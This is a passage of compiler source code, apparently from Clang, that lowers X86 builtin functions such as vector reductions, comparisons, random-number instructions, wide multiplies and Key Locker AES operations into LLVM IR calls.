return Builder.CreateCall(F, {Ops[0]});
}
case X86::BI__builtin_ia32_reduce_and_d512:
case X86::BI__builtin_ia32_reduce_and_q512: {
Function *F =
CGM.getIntrinsic(Intrinsic::vector_reduce_and, Ops[0]->getType());
return Builder.CreateCall(F, {Ops[0]});
}
case X86::BI__builtin_ia32_reduce_fadd_pd512:
case X86::BI__builtin_ia32_reduce_fadd_ps512:
case X86::BI__builtin_ia32_reduce_fadd_ph512:
case X86::BI__builtin_ia32_reduce_fadd_ph256:
case X86::BI__builtin_ia32_reduce_fadd_ph128: {
Function *F =
CGM.getIntrinsic(Intrinsic::vector_reduce_fadd, Ops[1]->getType());
Builder.getFastMathFlags().setAllowReassoc();
return Builder.CreateCall(F, {Ops[0], Ops[1]});
}
case X86::BI__builtin_ia32_reduce_fmul_pd512:
case X86::BI__builtin_ia32_reduce_fmul_ps512:
case X86::BI__builtin_ia32_reduce_fmul_ph512:
case X86::BI__builtin_ia32_reduce_fmul_ph256:
case X86::BI__builtin_ia32_reduce_fmul_ph128: {
Function *F =
CGM.getIntrinsic(Intrinsic::vector_reduce_fmul, Ops[1]->getType());
Builder.getFastMathFlags().setAllowReassoc();
return Builder.CreateCall(F, {Ops[0], Ops[1]});
}
case X86::BI__builtin_ia32_reduce_fmax_pd512:
case X86::BI__builtin_ia32_reduce_fmax_ps512:
case X86::BI__builtin_ia32_reduce_fmax_ph512:
case X86::BI__builtin_ia32_reduce_fmax_ph256:
case X86::BI__builtin_ia32_reduce_fmax_ph128: {
Function *F =
CGM.getIntrinsic(Intrinsic::vector_reduce_fmax, Ops[0]->getType());
Builder.getFastMathFlags().setNoNaNs();
return Builder.CreateCall(F, {Ops[0]});
}
case X86::BI__builtin_ia32_reduce_fmin_pd512:
case X86::BI__builtin_ia32_reduce_fmin_ps512:
case X86::BI__builtin_ia32_reduce_fmin_ph512:
case X86::BI__builtin_ia32_reduce_fmin_ph256:
case X86::BI__builtin_ia32_reduce_fmin_ph128: {
Function *F =
CGM.getIntrinsic(Intrinsic::vector_reduce_fmin, Ops[0]->getType());
Builder.getFastMathFlags().setNoNaNs();
return Builder.CreateCall(F, {Ops[0]});
}
case X86::BI__builtin_ia32_reduce_mul_d512:
case X86::BI__builtin_ia32_reduce_mul_q512: {
Function *F =
CGM.getIntrinsic(Intrinsic::vector_reduce_mul, Ops[0]->getType());
return Builder.CreateCall(F, {Ops[0]});
}
case X86::BI__builtin_ia32_reduce_or_d512:
case X86::BI__builtin_ia32_reduce_or_q512: {
Function *F =
CGM.getIntrinsic(Intrinsic::vector_reduce_or, Ops[0]->getType());
return Builder.CreateCall(F, {Ops[0]});
}
case X86::BI__builtin_ia32_reduce_smax_d512:
case X86::BI__builtin_ia32_reduce_smax_q512: {
Function *F =
CGM.getIntrinsic(Intrinsic::vector_reduce_smax, Ops[0]->getType());
return Builder.CreateCall(F, {Ops[0]});
}
case X86::BI__builtin_ia32_reduce_smin_d512:
case X86::BI__builtin_ia32_reduce_smin_q512: {
Function *F =
CGM.getIntrinsic(Intrinsic::vector_reduce_smin, Ops[0]->getType());
return Builder.CreateCall(F, {Ops[0]});
}
case X86::BI__builtin_ia32_reduce_umax_d512:
case X86::BI__builtin_ia32_reduce_umax_q512: {
Function *F =
CGM.getIntrinsic(Intrinsic::vector_reduce_umax, Ops[0]->getType());
return Builder.CreateCall(F, {Ops[0]});
}
case X86::BI__builtin_ia32_reduce_umin_d512:
case X86::BI__builtin_ia32_reduce_umin_q512: {
Function *F =
CGM.getIntrinsic(Intrinsic::vector_reduce_umin, Ops[0]->getType());
return Builder.CreateCall(F, {Ops[0]});
}
// 3DNow!
case X86::BI__builtin_ia32_pswapdsf:
case X86::BI__builtin_ia32_pswapdsi: {
llvm::Type *MMXTy = llvm::Type::getX86_MMXTy(getLLVMContext());
Ops[0] = Builder.CreateBitCast(Ops[0], MMXTy, "cast");
llvm::Function *F = CGM.getIntrinsic(Intrinsic::x86_3dnowa_pswapd);
return Builder.CreateCall(F, Ops, "pswapd");
}
case X86::BI__builtin_ia32_rdrand16_step:
case X86::BI__builtin_ia32_rdrand32_step:
case X86::BI__builtin_ia32_rdrand64_step:
case X86::BI__builtin_ia32_rdseed16_step:
case X86::BI__builtin_ia32_rdseed32_step:
case X86::BI__builtin_ia32_rdseed64_step: {
Intrinsic::ID ID;
switch (BuiltinID) {
default: llvm_unreachable("Unsupported intrinsic!");
case X86::BI__builtin_ia32_rdrand16_step:
ID = Intrinsic::x86_rdrand_16;
break;
case X86::BI__builtin_ia32_rdrand32_step:
ID = Intrinsic::x86_rdrand_32;
break;
case X86::BI__builtin_ia32_rdrand64_step:
ID = Intrinsic::x86_rdrand_64;
break;
case X86::BI__builtin_ia32_rdseed16_step:
ID = Intrinsic::x86_rdseed_16;
break;
case X86::BI__builtin_ia32_rdseed32_step:
ID = Intrinsic::x86_rdseed_32;
break;
case X86::BI__builtin_ia32_rdseed64_step:
ID = Intrinsic::x86_rdseed_64;
break;
}
Value *Call = Builder.CreateCall(CGM.getIntrinsic(ID));
Builder.CreateDefaultAlignedStore(Builder.CreateExtractValue(Call, 0),
Ops[0]);
return Builder.CreateExtractValue(Call, 1);
}
case X86::BI__builtin_ia32_addcarryx_u32:
case X86::BI__builtin_ia32_addcarryx_u64:
case X86::BI__builtin_ia32_subborrow_u32:
case X86::BI__builtin_ia32_subborrow_u64: {
Intrinsic::ID IID;
switch (BuiltinID) {
default: llvm_unreachable("Unsupported intrinsic!");
case X86::BI__builtin_ia32_addcarryx_u32:
IID = Intrinsic::x86_addcarry_32;
break;
case X86::BI__builtin_ia32_addcarryx_u64:
IID = Intrinsic::x86_addcarry_64;
break;
case X86::BI__builtin_ia32_subborrow_u32:
IID = Intrinsic::x86_subborrow_32;
break;
case X86::BI__builtin_ia32_subborrow_u64:
IID = Intrinsic::x86_subborrow_64;
break;
}
Value *Call = Builder.CreateCall(CGM.getIntrinsic(IID),
{ Ops[0], Ops[1], Ops[2] });
Builder.CreateDefaultAlignedStore(Builder.CreateExtractValue(Call, 1),
Ops[3]);
return Builder.CreateExtractValue(Call, 0);
}
case X86::BI__builtin_ia32_fpclassps128_mask:
case X86::BI__builtin_ia32_fpclassps256_mask:
case X86::BI__builtin_ia32_fpclassps512_mask:
case X86::BI__builtin_ia32_fpclassph128_mask:
case X86::BI__builtin_ia32_fpclassph256_mask:
case X86::BI__builtin_ia32_fpclassph512_mask:
case X86::BI__builtin_ia32_fpclasspd128_mask:
case X86::BI__builtin_ia32_fpclasspd256_mask:
case X86::BI__builtin_ia32_fpclasspd512_mask: {
unsigned NumElts =
cast<llvm::FixedVectorType>(Ops[0]->getType())->getNumElements();
Value *MaskIn = Ops[2];
Ops.erase(&Ops[2]);
Intrinsic::ID ID;
switch (BuiltinID) {
default: llvm_unreachable("Unsupported intrinsic!");
case X86::BI__builtin_ia32_fpclassph128_mask:
ID = Intrinsic::x86_avx512fp16_fpclass_ph_128;
break;
case X86::BI__builtin_ia32_fpclassph256_mask:
ID = Intrinsic::x86_avx512fp16_fpclass_ph_256;
break;
case X86::BI__builtin_ia32_fpclassph512_mask:
ID = Intrinsic::x86_avx512fp16_fpclass_ph_512;
break;
case X86::BI__builtin_ia32_fpclassps128_mask:
ID = Intrinsic::x86_avx512_fpclass_ps_128;
break;
case X86::BI__builtin_ia32_fpclassps256_mask:
ID = Intrinsic::x86_avx512_fpclass_ps_256;
break;
case X86::BI__builtin_ia32_fpclassps512_mask:
ID = Intrinsic::x86_avx512_fpclass_ps_512;
break;
case X86::BI__builtin_ia32_fpclasspd128_mask:
ID = Intrinsic::x86_avx512_fpclass_pd_128;
break;
case X86::BI__builtin_ia32_fpclasspd256_mask:
ID = Intrinsic::x86_avx512_fpclass_pd_256;
break;
case X86::BI__builtin_ia32_fpclasspd512_mask:
ID = Intrinsic::x86_avx512_fpclass_pd_512;
break;
}
Value *Fpclass = Builder.CreateCall(CGM.getIntrinsic(ID), Ops);
return EmitX86MaskedCompareResult(*this, Fpclass, NumElts, MaskIn);
}
case X86::BI__builtin_ia32_vp2intersect_q_512:
case X86::BI__builtin_ia32_vp2intersect_q_256:
case X86::BI__builtin_ia32_vp2intersect_q_128:
case X86::BI__builtin_ia32_vp2intersect_d_512:
case X86::BI__builtin_ia32_vp2intersect_d_256:
case X86::BI__builtin_ia32_vp2intersect_d_128: {
unsigned NumElts =
cast<llvm::FixedVectorType>(Ops[0]->getType())->getNumElements();
Intrinsic::ID ID;
switch (BuiltinID) {
default: llvm_unreachable("Unsupported intrinsic!");
case X86::BI__builtin_ia32_vp2intersect_q_512:
ID = Intrinsic::x86_avx512_vp2intersect_q_512;
break;
case X86::BI__builtin_ia32_vp2intersect_q_256:
ID = Intrinsic::x86_avx512_vp2intersect_q_256;
break;
case X86::BI__builtin_ia32_vp2intersect_q_128:
ID = Intrinsic::x86_avx512_vp2intersect_q_128;
break;
case X86::BI__builtin_ia32_vp2intersect_d_512:
ID = Intrinsic::x86_avx512_vp2intersect_d_512;
break;
case X86::BI__builtin_ia32_vp2intersect_d_256:
ID = Intrinsic::x86_avx512_vp2intersect_d_256;
break;
case X86::BI__builtin_ia32_vp2intersect_d_128:
ID = Intrinsic::x86_avx512_vp2intersect_d_128;
break;
}
Value *Call = Builder.CreateCall(CGM.getIntrinsic(ID), {Ops[0], Ops[1]});
Value *Result = Builder.CreateExtractValue(Call, 0);
Result = EmitX86MaskedCompareResult(*this, Result, NumElts, nullptr);
Builder.CreateDefaultAlignedStore(Result, Ops[2]);
Result = Builder.CreateExtractValue(Call, 1);
Result = EmitX86MaskedCompareResult(*this, Result, NumElts, nullptr);
return Builder.CreateDefaultAlignedStore(Result, Ops[3]);
}
case X86::BI__builtin_ia32_vpmultishiftqb128:
case X86::BI__builtin_ia32_vpmultishiftqb256:
case X86::BI__builtin_ia32_vpmultishiftqb512: {
Intrinsic::ID ID;
switch (BuiltinID) {
default: llvm_unreachable("Unsupported intrinsic!");
case X86::BI__builtin_ia32_vpmultishiftqb128:
ID = Intrinsic::x86_avx512_pmultishift_qb_128;
break;
case X86::BI__builtin_ia32_vpmultishiftqb256:
ID = Intrinsic::x86_avx512_pmultishift_qb_256;
break;
case X86::BI__builtin_ia32_vpmultishiftqb512:
ID = Intrinsic::x86_avx512_pmultishift_qb_512;
break;
}
return Builder.CreateCall(CGM.getIntrinsic(ID), Ops);
}
case X86::BI__builtin_ia32_vpshufbitqmb128_mask:
case X86::BI__builtin_ia32_vpshufbitqmb256_mask:
case X86::BI__builtin_ia32_vpshufbitqmb512_mask: {
unsigned NumElts =
cast<llvm::FixedVectorType>(Ops[0]->getType())->getNumElements();
Value *MaskIn = Ops[2];
Ops.erase(&Ops[2]);
Intrinsic::ID ID;
switch (BuiltinID) {
default: llvm_unreachable("Unsupported intrinsic!");
case X86::BI__builtin_ia32_vpshufbitqmb128_mask:
ID = Intrinsic::x86_avx512_vpshufbitqmb_128;
break;
case X86::BI__builtin_ia32_vpshufbitqmb256_mask:
ID = Intrinsic::x86_avx512_vpshufbitqmb_256;
break;
case X86::BI__builtin_ia32_vpshufbitqmb512_mask:
ID = Intrinsic::x86_avx512_vpshufbitqmb_512;
break;
}
Value *Shufbit = Builder.CreateCall(CGM.getIntrinsic(ID), Ops);
return EmitX86MaskedCompareResult(*this, Shufbit, NumElts, MaskIn);
}
// Packed comparison intrinsics.
case X86::BI__builtin_ia32_cmpeqps:
case X86::BI__builtin_ia32_cmpeqpd:
return getVectorFCmpIR(CmpInst::FCMP_OEQ, /*IsSignaling*/false);
case X86::BI__builtin_ia32_cmpltps:
case X86::BI__builtin_ia32_cmpltpd:
return getVectorFCmpIR(CmpInst::FCMP_OLT, /*IsSignaling*/true);
case X86::BI__builtin_ia32_cmpleps:
case X86::BI__builtin_ia32_cmplepd:
return getVectorFCmpIR(CmpInst::FCMP_OLE, /*IsSignaling*/true);
case X86::BI__builtin_ia32_cmpunordps:
case X86::BI__builtin_ia32_cmpunordpd:
return getVectorFCmpIR(CmpInst::FCMP_UNO, /*IsSignaling*/false);
case X86::BI__builtin_ia32_cmpneqps:
case X86::BI__builtin_ia32_cmpneqpd:
return getVectorFCmpIR(CmpInst::FCMP_UNE, /*IsSignaling*/false);
case X86::BI__builtin_ia32_cmpnltps:
case X86::BI__builtin_ia32_cmpnltpd:
return getVectorFCmpIR(CmpInst::FCMP_UGE, /*IsSignaling*/true);
case X86::BI__builtin_ia32_cmpnleps:
case X86::BI__builtin_ia32_cmpnlepd:
return getVectorFCmpIR(CmpInst::FCMP_UGT, /*IsSignaling*/true);
case X86::BI__builtin_ia32_cmpordps:
case X86::BI__builtin_ia32_cmpordpd:
return getVectorFCmpIR(CmpInst::FCMP_ORD, /*IsSignaling*/false);
case X86::BI__builtin_ia32_cmpph128_mask:
case X86::BI__builtin_ia32_cmpph256_mask:
case X86::BI__builtin_ia32_cmpph512_mask:
case X86::BI__builtin_ia32_cmpps128_mask:
case X86::BI__builtin_ia32_cmpps256_mask:
case X86::BI__builtin_ia32_cmpps512_mask:
case X86::BI__builtin_ia32_cmppd128_mask:
case X86::BI__builtin_ia32_cmppd256_mask:
case X86::BI__builtin_ia32_cmppd512_mask:
IsMaskFCmp = true;
LLVM_FALLTHROUGH;
case X86::BI__builtin_ia32_cmpps:
case X86::BI__builtin_ia32_cmpps256:
case X86::BI__builtin_ia32_cmppd:
case X86::BI__builtin_ia32_cmppd256: {
// Lower vector comparisons to fcmp instructions, ignoring the requested
// signaling behaviour and rounding mode. This is only possible if the
// fp-model is not strict and FENV_ACCESS is off.
// The third argument is the comparison condition, an integer in the
// range [0, 31].
unsigned CC = cast<llvm::ConstantInt>(Ops[2])->getZExtValue() & 0x1f;
// Lower to an IR fcmp instruction. Under non-strict FP the signaling
// distinction is lost, e.g. both _CMP_GT_OS and _CMP_GT_OQ translate to
// FCMP_OGT; IsSignaling only matters once constrained intrinsics are used.
FCmpInst::Predicate Pred;
bool IsSignaling;
// Predicates for 16-31 repeat the 0-15 predicates. Only the signaling
// behavior is inverted. We'll handle that after the switch.
switch (CC & 0xf) {
case 0x00: Pred = FCmpInst::FCMP_OEQ; IsSignaling = false; break;
case 0x01: Pred = FCmpInst::FCMP_OLT; IsSignaling = true; break;
case 0x02: Pred = FCmpInst::FCMP_OLE; IsSignaling = true; break;
case 0x03: Pred = FCmpInst::FCMP_UNO; IsSignaling = false; break;
case 0x04: Pred = FCmpInst::FCMP_UNE; IsSignaling = false; break;
case 0x05: Pred = FCmpInst::FCMP_UGE; IsSignaling = true; break;
case 0x06: Pred = FCmpInst::FCMP_UGT; IsSignaling = true; break;
case 0x07: Pred = FCmpInst::FCMP_ORD; IsSignaling = false; break;
case 0x08: Pred = FCmpInst::FCMP_UEQ; IsSignaling = false; break;
case 0x09: Pred = FCmpInst::FCMP_ULT; IsSignaling = true; break;
case 0x0a: Pred = FCmpInst::FCMP_ULE; IsSignaling = true; break;
case 0x0b: Pred = FCmpInst::FCMP_FALSE; IsSignaling = false; break;
case 0x0c: Pred = FCmpInst::FCMP_ONE; IsSignaling = false; break;
case 0x0d: Pred = FCmpInst::FCMP_OGE; IsSignaling = true; break;
case 0x0e: Pred = FCmpInst::FCMP_OGT; IsSignaling = true; break;
case 0x0f: Pred = FCmpInst::FCMP_TRUE; IsSignaling = false; break;
default: llvm_unreachable("Unhandled CC");
}
// Invert the signalling behavior for 16-31.
if (CC & 0x10)
IsSignaling = !IsSignaling;
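// E.g. CC 0x00 (_CMP_EQ_OQ) and CC 0x10 (_CMP_EQ_OS) both map to FCMP_OEQ;
// only the signaling behavior differs.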
// If the predicate is true or false and we're using constrained intrinsics,
// we don't have a compare intrinsic we can use. Just use the legacy X86
// specific intrinsic.
// If the intrinsic is mask enabled and we're using constrained intrinsics,
// use the legacy X86 specific intrinsic.
if (Builder.getIsFPConstrained() &&
(Pred == FCmpInst::FCMP_TRUE || Pred == FCmpInst::FCMP_FALSE ||
IsMaskFCmp)) {
Intrinsic::ID IID;
switch (BuiltinID) {
default: llvm_unreachable("Unexpected builtin");
case X86::BI__builtin_ia32_cmpps:
IID = Intrinsic::x86_sse_cmp_ps;
break;
case X86::BI__builtin_ia32_cmpps256:
IID = Intrinsic::x86_avx_cmp_ps_256;
break;
case X86::BI__builtin_ia32_cmppd:
IID = Intrinsic::x86_sse2_cmp_pd;
break;
case X86::BI__builtin_ia32_cmppd256:
IID = Intrinsic::x86_avx_cmp_pd_256;
break;
case X86::BI__builtin_ia32_cmpps512_mask:
IID = Intrinsic::x86_avx512_mask_cmp_ps_512;
break;
case X86::BI__builtin_ia32_cmppd512_mask:
IID = Intrinsic::x86_avx512_mask_cmp_pd_512;
break;
case X86::BI__builtin_ia32_cmpps128_mask:
IID = Intrinsic::x86_avx512_mask_cmp_ps_128;
break;
case X86::BI__builtin_ia32_cmpps256_mask:
IID = Intrinsic::x86_avx512_mask_cmp_ps_256;
break;
case X86::BI__builtin_ia32_cmppd128_mask:
IID = Intrinsic::x86_avx512_mask_cmp_pd_128;
break;
case X86::BI__builtin_ia32_cmppd256_mask:
IID = Intrinsic::x86_avx512_mask_cmp_pd_256;
break;
}
Function *Intr = CGM.getIntrinsic(IID);
if (IsMaskFCmp) {
unsigned NumElts =
cast<llvm::FixedVectorType>(Ops[0]->getType())->getNumElements();
Ops[3] = getMaskVecValue(*this, Ops[3], NumElts);
Value *Cmp = Builder.CreateCall(Intr, Ops);
return EmitX86MaskedCompareResult(*this, Cmp, NumElts, nullptr);
}
return Builder.CreateCall(Intr, Ops);
}
// Builtins with the _mask suffix return an integer bitmask; builtins
// without it return a vector of integers of the same width as the inputs.
if (IsMaskFCmp) {
// We ignore SAE if strict FP is disabled. We only keep precise
// exception behavior under strict FP.
// NOTE: If strict FP does ever go through here a CGFPOptionsRAII
// object will be required.
unsigned NumElts =
cast<llvm::FixedVectorType>(Ops[0]->getType())->getNumElements();
Value *Cmp;
if (IsSignaling)
Cmp = Builder.CreateFCmpS(Pred, Ops[0], Ops[1]);
else
Cmp = Builder.CreateFCmp(Pred, Ops[0], Ops[1]);
return EmitX86MaskedCompareResult(*this, Cmp, NumElts, Ops[3]);
}
return getVectorFCmpIR(Pred, IsSignaling);
}
// SSE scalar comparison intrinsics
case X86::BI__builtin_ia32_cmpeqss:
return getCmpIntrinsicCall(Intrinsic::x86_sse_cmp_ss, 0);
case X86::BI__builtin_ia32_cmpltss:
return getCmpIntrinsicCall(Intrinsic::x86_sse_cmp_ss, 1);
case X86::BI__builtin_ia32_cmpless:
return getCmpIntrinsicCall(Intrinsic::x86_sse_cmp_ss, 2);
case X86::BI__builtin_ia32_cmpunordss:
return getCmpIntrinsicCall(Intrinsic::x86_sse_cmp_ss, 3);
case X86::BI__builtin_ia32_cmpneqss:
return getCmpIntrinsicCall(Intrinsic::x86_sse_cmp_ss, 4);
case X86::BI__builtin_ia32_cmpnltss:
return getCmpIntrinsicCall(Intrinsic::x86_sse_cmp_ss, 5);
case X86::BI__builtin_ia32_cmpnless:
return getCmpIntrinsicCall(Intrinsic::x86_sse_cmp_ss, 6);
case X86::BI__builtin_ia32_cmpordss:
return getCmpIntrinsicCall(Intrinsic::x86_sse_cmp_ss, 7);
case X86::BI__builtin_ia32_cmpeqsd:
return getCmpIntrinsicCall(Intrinsic::x86_sse2_cmp_sd, 0);
case X86::BI__builtin_ia32_cmpltsd:
return getCmpIntrinsicCall(Intrinsic::x86_sse2_cmp_sd, 1);
case X86::BI__builtin_ia32_cmplesd:
return getCmpIntrinsicCall(Intrinsic::x86_sse2_cmp_sd, 2);
case X86::BI__builtin_ia32_cmpunordsd:
return getCmpIntrinsicCall(Intrinsic::x86_sse2_cmp_sd, 3);
case X86::BI__builtin_ia32_cmpneqsd:
return getCmpIntrinsicCall(Intrinsic::x86_sse2_cmp_sd, 4);
case X86::BI__builtin_ia32_cmpnltsd:
return getCmpIntrinsicCall(Intrinsic::x86_sse2_cmp_sd, 5);
case X86::BI__builtin_ia32_cmpnlesd:
return getCmpIntrinsicCall(Intrinsic::x86_sse2_cmp_sd, 6);
case X86::BI__builtin_ia32_cmpordsd:
return getCmpIntrinsicCall(Intrinsic::x86_sse2_cmp_sd, 7);
// f16c half2float intrinsics
case X86::BI__builtin_ia32_vcvtph2ps:
case X86::BI__builtin_ia32_vcvtph2ps256:
case X86::BI__builtin_ia32_vcvtph2ps_mask:
case X86::BI__builtin_ia32_vcvtph2ps256_mask:
case X86::BI__builtin_ia32_vcvtph2ps512_mask: {
CodeGenFunction::CGFPOptionsRAII FPOptsRAII(*this, E);
return EmitX86CvtF16ToFloatExpr(*this, Ops, ConvertType(E->getType()));
}
// AVX512 bf16 intrinsics
case X86::BI__builtin_ia32_cvtneps2bf16_128_mask: {
Ops[2] = getMaskVecValue(
*this, Ops[2],
cast<llvm::FixedVectorType>(Ops[0]->getType())->getNumElements());
Intrinsic::ID IID = Intrinsic::x86_avx512bf16_mask_cvtneps2bf16_128;
return Builder.CreateCall(CGM.getIntrinsic(IID), Ops);
}
case X86::BI__builtin_ia32_cvtsbf162ss_32:
return EmitX86CvtBF16ToFloatExpr(*this, E, Ops);
case X86::BI__builtin_ia32_cvtneps2bf16_256_mask:
case X86::BI__builtin_ia32_cvtneps2bf16_512_mask: {
Intrinsic::ID IID;
switch (BuiltinID) {
default: llvm_unreachable("Unsupported intrinsic!");
case X86::BI__builtin_ia32_cvtneps2bf16_256_mask:
IID = Intrinsic::x86_avx512bf16_cvtneps2bf16_256;
break;
case X86::BI__builtin_ia32_cvtneps2bf16_512_mask:
IID = Intrinsic::x86_avx512bf16_cvtneps2bf16_512;
break;
}
Value *Res = Builder.CreateCall(CGM.getIntrinsic(IID), Ops[0]);
return EmitX86Select(*this, Ops[2], Res, Ops[1]);
}
case X86::BI__emul:
case X86::BI__emulu: {
llvm::Type *Int64Ty = llvm::IntegerType::get(getLLVMContext(), 64);
bool isSigned = (BuiltinID == X86::BI__emul);
Value *LHS = Builder.CreateIntCast(Ops[0], Int64Ty, isSigned);
Value *RHS = Builder.CreateIntCast(Ops[1], Int64Ty, isSigned);
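// A sketch of the IR this emits for the signed __emul(a, b):
//   %lhs = sext i32 %a to i64
//   %rhs = sext i32 %b to i64
//   %mul = mul nsw i64 %lhs, %rhs
// (__emulu uses zext and mul nuw instead.)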
return Builder.CreateMul(LHS, RHS, "", !isSigned, isSigned);
}
case X86::BI__mulh:
case X86::BI__umulh:
case X86::BI_mul128:
case X86::BI_umul128: {
llvm::Type *ResType = ConvertType(E->getType());
llvm::Type *Int128Ty = llvm::IntegerType::get(getLLVMContext(), 128);
bool IsSigned = (BuiltinID == X86::BI__mulh || BuiltinID == X86::BI_mul128);
Value *LHS = Builder.CreateIntCast(Ops[0], Int128Ty, IsSigned);
Value *RHS = Builder.CreateIntCast(Ops[1], Int128Ty, IsSigned);
Value *MulResult, *HigherBits;
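// A sketch of the IR for the unsigned flavors, _umul128(a, b, &hi):
//   %lhs = zext i64 %a to i128
//   %rhs = zext i64 %b to i128
//   %mul = mul nuw i128 %lhs, %rhs
//   %hi  = lshr i128 %mul, 64
// __umulh returns the truncated high half; _umul128 also stores it through
// the third argument and returns the low half.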
if (IsSigned) {
MulResult = Builder.CreateNSWMul(LHS, RHS);
HigherBits = Builder.CreateAShr(MulResult, 64);
} else {
MulResult = Builder.CreateNUWMul(LHS, RHS);
HigherBits = Builder.CreateLShr(MulResult, 64);
}
HigherBits = Builder.CreateIntCast(HigherBits, ResType, IsSigned);
if (BuiltinID == X86::BI__mulh || BuiltinID == X86::BI__umulh)
return HigherBits;
Address HighBitsAddress = EmitPointerWithAlignment(E->getArg(2));
Builder.CreateStore(HigherBits, HighBitsAddress);
return Builder.CreateIntCast(MulResult, ResType, IsSigned);
}
case X86::BI__faststorefence: {
return Builder.CreateFence(llvm::AtomicOrdering::SequentiallyConsistent,
llvm::SyncScope::System);
}
case X86::BI__shiftleft128:
case X86::BI__shiftright128: {
llvm::Function *F = CGM.getIntrinsic(
BuiltinID == X86::BI__shiftleft128 ? Intrinsic::fshl : Intrinsic::fshr,
Int64Ty);
// Flip low/high ops and zero-extend amount to matching type.
// shiftleft128(Low, High, Amt) -> fshl(High, Low, Amt)
// shiftright128(Low, High, Amt) -> fshr(High, Low, Amt)
std::swap(Ops[0], Ops[1]);
Ops[2] = Builder.CreateZExt(Ops[2], Int64Ty);
return Builder.CreateCall(F, Ops);
}
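// MSVC's barrier intrinsics only constrain the compiler, not the hardware,
// hence the single-thread scope on the fence below.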
case X86::BI_ReadWriteBarrier:
case X86::BI_ReadBarrier:
case X86::BI_WriteBarrier: {
return Builder.CreateFence(llvm::AtomicOrdering::SequentiallyConsistent,
llvm::SyncScope::SingleThread);
}
case X86::BI_AddressOfReturnAddress: {
Function *F =
CGM.getIntrinsic(Intrinsic::addressofreturnaddress, AllocaInt8PtrTy);
return Builder.CreateCall(F);
}
case X86::BI__stosb: {
// We treat __stosb as a volatile memset - it may not generate a "rep stosb"
// instruction, but it will create a memset that won't be optimized away.
return Builder.CreateMemSet(Ops[0], Ops[1], Ops[2], Align(1), true);
}
case X86::BI__ud2:
// llvm.trap lowers to a ud2a instruction on x86.
return EmitTrapCall(Intrinsic::trap);
case X86::BI__int2c: {
// The int 0x2c interrupt signals a driver assertion failure in x86 NT
// kernels.
llvm::FunctionType *FTy = llvm::FunctionType::get(VoidTy, false);
llvm::InlineAsm *IA =
llvm::InlineAsm::get(FTy, "int $$0x2c", "", /*hasSideEffects=*/true);
llvm::AttributeList NoReturnAttr = llvm::AttributeList::get(
getLLVMContext(), llvm::AttributeList::FunctionIndex,
llvm::Attribute::NoReturn);
llvm::CallInst *CI = Builder.CreateCall(IA);
CI->setAttributes(NoReturnAttr);
return CI;
}
case X86::BI__readfsbyte:
case X86::BI__readfsword:
case X86::BI__readfsdword:
case X86::BI__readfsqword: {
llvm::Type *IntTy = ConvertType(E->getType());
Value *Ptr =
Builder.CreateIntToPtr(Ops[0], llvm::PointerType::get(IntTy, 257));
LoadInst *Load = Builder.CreateAlignedLoad(
IntTy, Ptr, getContext().getTypeAlignInChars(E->getType()));
Load->setVolatile(true);
return Load;
}
case X86::BI__readgsbyte:
case X86::BI__readgsword:
case X86::BI__readgsdword:
case X86::BI__readgsqword: {
llvm::Type *IntTy = ConvertType(E->getType());
Value *Ptr =
Builder.CreateIntToPtr(Ops[0], llvm::PointerType::get(IntTy, 256));
LoadInst *Load = Builder.CreateAlignedLoad(
IntTy, Ptr, getContext().getTypeAlignInChars(E->getType()));
Load->setVolatile(true);
return Load;
}
case X86::BI__builtin_ia32_paddsb512:
case X86::BI__builtin_ia32_paddsw512:
case X86::BI__builtin_ia32_paddsb256:
case X86::BI__builtin_ia32_paddsw256:
case X86::BI__builtin_ia32_paddsb128:
case X86::BI__builtin_ia32_paddsw128:
return EmitX86BinaryIntrinsic(*this, Ops, Intrinsic::sadd_sat);
case X86::BI__builtin_ia32_paddusb512:
case X86::BI__builtin_ia32_paddusw512:
case X86::BI__builtin_ia32_paddusb256:
case X86::BI__builtin_ia32_paddusw256:
case X86::BI__builtin_ia32_paddusb128:
case X86::BI__builtin_ia32_paddusw128:
return EmitX86BinaryIntrinsic(*this, Ops, Intrinsic::uadd_sat);
case X86::BI__builtin_ia32_psubsb512:
case X86::BI__builtin_ia32_psubsw512:
case X86::BI__builtin_ia32_psubsb256:
case X86::BI__builtin_ia32_psubsw256:
case X86::BI__builtin_ia32_psubsb128:
case X86::BI__builtin_ia32_psubsw128:
return EmitX86BinaryIntrinsic(*this, Ops, Intrinsic::ssub_sat);
case X86::BI__builtin_ia32_psubusb512:
case X86::BI__builtin_ia32_psubusw512:
case X86::BI__builtin_ia32_psubusb256:
case X86::BI__builtin_ia32_psubusw256:
case X86::BI__builtin_ia32_psubusb128:
case X86::BI__builtin_ia32_psubusw128:
return EmitX86BinaryIntrinsic(*this, Ops, Intrinsic::usub_sat);
case X86::BI__builtin_ia32_encodekey128_u32: {
Intrinsic::ID IID = Intrinsic::x86_encodekey128;
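// The intrinsic returns the 32-bit control word as struct result 0 and the
// 384-bit key handle as results 1-3; store the handle to Ops[2] in three
// 16-byte chunks and return the control word.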
Value *Call = Builder.CreateCall(CGM.getIntrinsic(IID), {Ops[0], Ops[1]});
for (int i = 0; i < 3; ++i) {
Value *Extract = Builder.CreateExtractValue(Call, i + 1);
Value *Ptr = Builder.CreateConstGEP1_32(Int8Ty, Ops[2], i * 16);
Ptr = Builder.CreateBitCast(
Ptr, llvm::PointerType::getUnqual(Extract->getType()));
Builder.CreateAlignedStore(Extract, Ptr, Align(1));
}
return Builder.CreateExtractValue(Call, 0);
}
case X86::BI__builtin_ia32_encodekey256_u32: {
Intrinsic::ID IID = Intrinsic::x86_encodekey256;
Value *Call =
Builder.CreateCall(CGM.getIntrinsic(IID), {Ops[0], Ops[1], Ops[2]});
for (int i = 0; i < 4; ++i) {
Value *Extract = Builder.CreateExtractValue(Call, i + 1);
Value *Ptr = Builder.CreateConstGEP1_32(Int8Ty, Ops[3], i * 16);
Ptr = Builder.CreateBitCast(
Ptr, llvm::PointerType::getUnqual(Extract->getType()));
Builder.CreateAlignedStore(Extract, Ptr, Align(1));
}
return Builder.CreateExtractValue(Call, 0);
}
case X86::BI__builtin_ia32_aesenc128kl_u8:
case X86::BI__builtin_ia32_aesdec128kl_u8:
case X86::BI__builtin_ia32_aesenc256kl_u8:
case X86::BI__builtin_ia32_aesdec256kl_u8: {
Intrinsic::ID IID;
StringRef BlockName;
switch (BuiltinID) {
default:
llvm_unreachable("Unexpected builtin");
case X86::BI__builtin_ia32_aesenc128kl_u8:
IID = Intrinsic::x86_aesenc128kl;
BlockName = "aesenc128kl";
break;
case X86::BI__builtin_ia32_aesdec128kl_u8:
IID = Intrinsic::x86_aesdec128kl;
